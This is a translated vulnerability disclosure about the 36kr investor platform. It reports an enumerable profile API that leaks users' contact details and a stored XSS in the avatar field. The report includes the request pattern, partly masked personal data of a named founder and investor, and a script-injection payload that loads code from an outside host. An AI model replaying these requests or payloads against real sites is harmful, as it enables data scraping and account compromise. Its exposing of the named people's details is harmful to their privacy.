36kr user information leakage: contact information of all investors/founders + stored XSS
When I met an investor in the morning, he said, "Let me remember your team in 10 seconds." I gave him a slap when I thought about it. While he was still stunned, I ran quickly, I just received a text message asking me to go into details at tomorrow. Should I go?
Test environment:
Note2 + 36kr Android 2.1.0
1. unauthorized access to the app interface to obtain user information
Register and log on to rong.36kr.com. I will verify it by text message.
Access interface url:
http://rong.36kr.com/api/v1/ios-user/-ID-/profile
The ID can be traversed. For example, you can view the contact information of the founder of the Note app:
View the contact information of the Founder:
Http://rong.36kr.com/api/v1/ios-user/711/profile (You need to log on to your account first)
User ": {" avatar ":" http://krplus-pic.b0.upaiyun.com/201503/23195614/7be9e2cc259d7834.jpg "," email ":" laputan mosaic @ fotoplace. cc "," Iser ": 1," id ": 711," investorType ": 100," isDisplayWeixin ": false," name ":" Willow "," nickAvatar ": "http://wx.qlogo.cn/mmopen/ajNVdqHZLLAl21jrHaCHQzgF1DrAsBDIJ1RJ3Hvvr8PCfmCQIkfbBHKoItkKTgDBV4SDZSFgiaoZUs4sdR7udXQ/0", "nickName": "Willow (fotoplace)", "phone": "13918331 Mosaic" }}, "msg": "operation successful! "}
View contact information of investors:
Http://rong.36kr.com/api/v1/ios-user/28633/profile
User ": {" avatar ":" http://krplus-pic.b0.upaiyun.com/c00dd2691e0937663493df104fb18976 "," email ":" mosaic [email protected] "," enterpriser ": 0," id ": 28633," intro ": "Hirst Capital China Investment Director", "investorType": 20, "isDisplayWeixin": false, "linkedin": "", "name": "Hu Ying Qing ", "nickName": "1350199 Mosaic", "phone": "1350199 Mosaic", "weibo ":""}
Bytes ---------------------------------------------------------------------------------------
2. Stored xss
The app uploads an avatar and directly calls the image address.
This is the request package for updating the Avatar.
PUT/api/v1/user/my id/basic HTTP/1.1 Cookie: my Cookie information; Content-Length: 54Content-Type: application/x-www-form-urlencodedHost: rong.36kr. comConnection: Keep-AliveUser-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4) avatar = http://krplus-pic.b0.upaiyun.com/xxxxxx.jpg "> <script src = http://t.cn/xxx> </script>
The avatar parameter can be customized. xss code can be inserted because no filtering is performed. The effect is as follows:
The key token information in cookies should be protected by httponly.
Solution:
In xss, I only tested the profile picture of the APP. Check the user name and personal information.